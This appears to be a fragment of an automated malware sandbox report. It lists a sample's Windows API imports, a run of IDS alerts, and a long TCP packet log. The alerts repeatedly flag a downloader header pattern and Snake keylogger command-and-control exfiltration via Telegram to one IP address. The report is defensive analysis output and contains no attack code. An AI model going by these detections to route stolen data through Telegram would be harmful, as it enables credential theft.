                                                                                                                ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                EnglishUnited States
                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2025-01-10T22:43:24.036995+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.649869142.250.186.142443TCP
                                                                                                                2025-01-10T22:43:30.402572+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649910132.226.8.16980TCP
                                                                                                                2025-01-10T22:43:37.277592+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649910132.226.8.16980TCP
                                                                                                                2025-01-10T22:43:37.911520+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.649964149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:38.290741+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.649964149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:39.340074+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649973132.226.8.16980TCP
                                                                                                                2025-01-10T22:43:39.938527+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.649978149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:40.403998+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.649978149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:41.885949+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.649989149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:42.193783+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.649989149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:43.707201+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.649992149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:44.155656+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.649992149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:45.360498+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.649995149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:45.707079+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.649995149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:46.930726+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.649997149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:47.355654+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.649997149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:48.575526+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.649999149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:48.810566+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.649999149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:50.047051+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650001149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:50.501847+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650001149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:52.277358+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650003149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:52.514440+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650003149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:53.729116+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650005149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:53.963506+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650005149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:55.173244+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650007149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:55.399919+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650007149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:56.652227+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650009149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:56.922750+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650009149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:58.160008+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650011149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:58.556032+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650011149.154.167.220443TCP
                                                                                                                2025-01-10T22:43:59.932227+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650013149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:00.306097+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650013149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:01.623949+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650015149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:01.880986+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650015149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:03.134782+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650017149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:03.565415+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650017149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:04.758561+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650019149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:05.137762+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650019149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:06.367104+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650021149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:06.769294+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650021149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:08.066307+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650025149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:08.473446+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650025149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:09.672750+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650027149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:10.067659+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650027149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:11.303252+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650029149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:11.615715+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650029149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:12.813731+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650031149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:13.222558+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650031149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:14.526148+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650033149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:14.906701+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650033149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:16.120073+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650035149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:16.461260+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650035149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:17.685248+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650037149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:18.073657+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650037149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:19.289499+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650039149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:19.745626+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650039149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:20.978871+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650041149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:21.411514+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650041149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:22.609261+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650043149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:23.038141+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650043149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:24.287303+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650045149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:24.633538+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650045149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:25.834440+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650047149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:26.106237+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650047149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:27.319081+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650049149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:27.698587+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650049149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:28.908906+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650051149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:29.441104+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650051149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:30.704871+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650053149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:30.987411+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650053149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:32.205043+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650055149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:32.503707+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650055149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:33.725897+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650057149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:33.964570+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650057149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:35.183983+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650059149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:35.501882+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650059149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:36.713518+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650061149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:37.002302+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650061149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:38.299101+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650063149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:38.669450+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650063149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:39.887149+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650065149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:40.277352+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650065149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:41.504856+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650068149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:41.777070+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650068149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:43.037460+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650070149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:43.444454+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650070149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:44.746296+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650072149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:45.313609+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650072149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:46.512673+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650074149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:46.861010+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650074149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:48.048135+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650076149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:48.356145+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650076149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:49.593350+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650078149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:50.021137+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650078149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:51.329486+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650080149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:51.657111+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650080149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:52.859130+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650082149.154.167.220443TCP
                                                                                                                2025-01-10T22:44:53.187760+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650082149.154.167.220443TCP
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Jan 10, 2025 22:43:22.923286915 CET49869443192.168.2.6142.250.186.142
                                                                                                                Jan 10, 2025 22:43:22.923353910 CET44349869142.250.186.142192.168.2.6
                                                                                                                Jan 10, 2025 22:43:22.923480988 CET49869443192.168.2.6142.250.186.142
                                                                                                                Jan 10, 2025 22:43:22.938307047 CET49869443192.168.2.6142.250.186.142
                                                                                                                Jan 10, 2025 22:43:22.938319921 CET44349869142.250.186.142192.168.2.6
                                                                                                                Jan 10, 2025 22:43:23.579087973 CET44349869142.250.186.142192.168.2.6
                                                                                                                Jan 10, 2025 22:43:23.579241991 CET49869443192.168.2.6142.250.186.142
                                                                                                                Jan 10, 2025 22:43:23.579857111 CET44349869142.250.186.142192.168.2.6
                                                                                                                Jan 10, 2025 22:43:23.579916000 CET49869443192.168.2.6142.250.186.142
                                                                                                                Jan 10, 2025 22:43:23.738732100 CET49869443192.168.2.6142.250.186.142
                                                                                                                Jan 10, 2025 22:43:23.738748074 CET44349869142.250.186.142192.168.2.6
                                                                                                                Jan 10, 2025 22:43:23.739059925 CET44349869142.250.186.142192.168.2.6
                                                                                                                Jan 10, 2025 22:43:23.739113092 CET49869443192.168.2.6142.250.186.142
                                                                                                                Jan 10, 2025 22:43:23.743503094 CET49869443192.168.2.6142.250.186.142
                                                                                                                Jan 10, 2025 22:43:23.787338018 CET44349869142.250.186.142192.168.2.6
                                                                                                                Jan 10, 2025 22:43:24.037074089 CET44349869142.250.186.142192.168.2.6
                                                                                                                Jan 10, 2025 22:43:24.037168026 CET49869443192.168.2.6142.250.186.142
                                                                                                                Jan 10, 2025 22:43:24.037193060 CET44349869142.250.186.142192.168.2.6
                                                                                                                Jan 10, 2025 22:43:24.037236929 CET49869443192.168.2.6142.250.186.142
                                                                                                                Jan 10, 2025 22:43:24.037244081 CET44349869142.250.186.142192.168.2.6
                                                                                                                Jan 10, 2025 22:43:24.037288904 CET49869443192.168.2.6142.250.186.142
                                                                                                                Jan 10, 2025 22:43:24.037321091 CET49869443192.168.2.6142.250.186.142
                                                                                                                Jan 10, 2025 22:43:24.037338018 CET44349869142.250.186.142192.168.2.6
                                                                                                                Jan 10, 2025 22:43:24.037344933 CET49869443192.168.2.6142.250.186.142
                                                                                                                Jan 10, 2025 22:43:24.037380934 CET49869443192.168.2.6142.250.186.142
                                                                                                                Jan 10, 2025 22:43:24.069421053 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:24.069464922 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:24.069559097 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:24.069912910 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:24.069931030 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:24.709721088 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:24.710210085 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:24.714365959 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:24.714386940 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:24.714699030 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:24.714904070 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:24.723520994 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:24.767339945 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.805438995 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.805535078 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.811347008 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.811425924 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.823787928 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.823884964 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.823899031 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.824095964 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.830080032 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.830141068 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.892003059 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.892070055 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.892163038 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.892182112 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.892231941 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.894737959 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.895494938 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.895505905 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.895560026 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.901045084 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.903477907 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.903490067 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.903568983 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.907248020 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.907309055 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.907342911 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.907397032 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.913734913 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.915483952 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.915496111 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.915539026 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.920037985 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.923500061 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.923511028 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.923573017 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.926208019 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.927485943 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.927495956 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.927548885 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.932595968 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.933828115 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.933839083 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.933886051 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.938409090 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.939511061 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.939521074 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.939575911 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.944509983 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.947483063 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.947495937 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.947542906 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.950128078 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.951486111 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.951495886 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.951543093 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.955753088 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.959492922 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.959507942 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.962097883 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.962107897 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.962179899 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.978665113 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.978737116 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.978766918 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.978820086 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.978882074 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.979038000 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.979089022 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.979099035 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.979466915 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.981065035 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.983489037 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.983500957 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.983549118 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.986912012 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.987057924 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.987098932 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.987108946 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.987134933 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.987178087 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.992266893 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.995500088 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.995517969 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.997895956 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.997965097 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:27.997973919 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:27.999476910 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.002716064 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:28.003509998 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.003524065 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:28.003571987 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.007689953 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:28.011491060 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.011501074 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:28.011557102 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.012442112 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:28.012495995 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.012501955 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:28.012556076 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.017235041 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:28.017548084 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.017564058 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:28.017621040 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.021827936 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:28.021900892 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.021910906 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:28.023480892 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.026618004 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:28.026679993 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.026715994 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:28.027503967 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.031183004 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:28.031246901 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.031276941 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:28.031487942 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.035761118 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:28.039494991 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.039504051 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:28.039561987 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.040203094 CET44349875172.217.18.97192.168.2.6
